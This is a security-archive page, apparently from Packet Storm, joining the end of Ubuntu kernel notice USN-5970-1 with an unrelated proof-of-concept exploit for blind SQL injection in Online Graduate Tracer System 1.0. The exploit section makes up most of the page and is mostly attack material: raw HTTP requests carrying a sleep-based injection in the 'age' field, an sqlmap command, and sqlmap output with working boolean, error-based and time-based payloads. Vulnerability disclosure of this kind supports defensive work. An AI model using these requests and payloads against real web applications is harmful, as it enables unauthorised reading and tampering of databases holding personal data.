linux-image-5.19.0-1021-lowlatency-64k  5.19.0-1021.22   linux-image-5.19.0-1022-aws     5.19.0-1022.23   linux-image-5.19.0-1022-azure   5.19.0-1022.23   linux-image-5.19.0-38-generic   5.19.0-38.39   linux-image-5.19.0-38-generic-64k  5.19.0-38.39   linux-image-5.19.0-38-generic-lpae  5.19.0-38.39   linux-image-aws                 5.19.0.1022.19   linux-image-azure               5.19.0.1022.18   linux-image-gcp                 5.19.0.1019.16   linux-image-generic             5.19.0.38.34   linux-image-generic-64k         5.19.0.38.34   linux-image-generic-lpae        5.19.0.38.34   linux-image-ibm                 5.19.0.1019.16   linux-image-kvm                 5.19.0.1020.17   linux-image-lowlatency          5.19.0.1021.17   linux-image-lowlatency-64k      5.19.0.1021.17   linux-image-oracle              5.19.0.1019.16   linux-image-raspi               5.19.0.1015.14   linux-image-raspi-nolpae        5.19.0.1015.14   linux-image-virtual             5.19.0.38.34After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5970-1   CVE-2022-2196, CVE-2022-42328, CVE-2022-42329, CVE-2022-4382,   CVE-2023-0045, CVE-2023-0266, CVE-2023-0469, CVE-2023-1195,   CVE-2023-23559Package Information:   https://launchpad.net/ubuntu/+source/linux/5.19.0-38.39   https://launchpad.net/ubuntu/+source/linux-aws/5.19.0-1022.23   https://launchpad.net/ubuntu/+source/linux-azure/5.19.0-1022.23   https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1019.21   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1019.21   https://launchpad.net/ubuntu/+source/linux-kvm/5.19.0-1020.21   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.19.0-1021.22   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1019.22   https://launchpad.net/ubuntu/+source/linux-raspi/5.19.0-1015.22

Ubuntu Security Notice USN-5970-1

Online Graduate Tracer System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Graduate Tracer System - Multiple SQLi# Date: 24/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the fill-in forms of Online Graduate Tracer System allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "age" parameter. ## Request PoC```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```This request causes a Fatal error. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "age" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 10 command works. ```POST /tracking/ HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/tracking/Content-Type: application/x-www-form-urlencodedContent-Length: 666fullname=TKeljbcD&age=24'%2b(select*from(select(sleep(10)))a)%2b'&sex=&dob=11%2f11%2f1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working+Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5+yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5+yrs&num=6-10+yrs&num=10-15+yrs&num=16+yrs+above&mincome=325978&reason=992014&consider=Yes&submit=```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/sts]└─# sqlmap -r sqli.txt -p 'age' --batch --dbs --level=3 --risk=2---snip---[01:53:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'POST parameter 'age' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests:---Parameter: age (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: fullname=TKeljbcD&age=24' RLIKE (SELECT (CASE WHEN (6534=6534) THEN 24 ELSE 0x28 END)) AND 'ATRa'='ATRa&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 9933 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(9933=9933,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PwMK'='PwMK&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: fullname=TKeljbcD&age=24' AND (SELECT 7274 FROM (SELECT(SLEEP(5)))gxIn) AND 'maqj'='maqj&sex=&dob=11/11/1992&cs=&religion=&street=518287&barangay=933877&municipal=149726&province=293419&region=&zipcode=21788&country=767093&course=&batch=&facebook=329348&twitter=488487&phonenumber=197-436-9799&email=dKYxqIen@burpcollaborator.net&estatus=Employed&organization=&profession=503409&type=Working Fulltime&location=local&location=abroad&status=Permanent&status=Contractual&status=Casual&status=Others&number=1-5 yrs&income=359935&relate=Yes&sreason=621051&nature=792251&company=597673&num=0-5 yrs&num=6-10 yrs&num=10-15 yrs&num=16 yrs above&mincome=325978&reason=992014&consider=Yes&submit=---[01:53:50] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)---snip---```## The "barangay", "batch", "company", "country", "course", "cs", "dob", "email", "estatus", "facebook", "fullname", "income", "location", "mincome", "municipal", "nature", "number", "organization", "phonenumber", "profession", "province", "region", "relate", "religion", "sex", "sreason", "status", "street", "twitter", "type" and "zipcode" parameters in the POST requests are also vulnerable. They can be exploited in the same way.

Source

Packet Storm